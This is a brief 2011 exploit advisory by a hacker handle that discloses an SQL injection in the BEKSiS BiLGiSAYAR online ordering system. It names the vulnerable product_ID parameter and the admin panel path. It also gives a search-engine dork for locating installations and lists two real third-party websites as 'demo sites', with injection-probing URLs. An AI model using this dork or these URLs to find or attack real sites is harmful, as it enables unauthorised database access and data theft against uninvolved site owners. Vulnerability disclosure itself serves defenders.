BEKSiS BiLGiSAYAR Online Siparis Sistemi suffers from a remote SQL injection vulnerability.
37974f75200d5a1c314f2aa081a1b381260323fd0206e8fa6fbc1be1f9e0eef2
=========================================================
# Exploit Title : BEKSiS BiLGiSAYAR Online Siparis Sistemi SQL Injection Vulnerability
# Date : 20 July 2011
# Author : CriminalCoder
# Platform/Tested on: Windows Xp
# my web : http://beyz4de.wordpress.com
# contact: criminalcoder@hotmail.de
# twitter: twitter.com/#!/criminalcoder
# Version : N/N
# Software Link: : www.beksis.com
# dork : intext:"BEKSiS BiLGiSAYAR Online Sipariº Sistemi"
======================================================================
# vuln herehttp://127.0.0.1/path/default.asp?mod=product&product_ID=[sqli]&cat_ID=1orhttp://127.0.0.1/path/?mod=product&cat_id=1&product_id=[sqli]
# script admin panelhttp://127.0.0.1/path/admin/default.asp
# demo siteshttp://www.vogueimport.com.tr/?mod=product&cat_id=48&product_id='862http://www.martikagit.com/?mod=product&cat_id=47&product_id='858
# greetz:all rootarea.org / el-kaide.com users..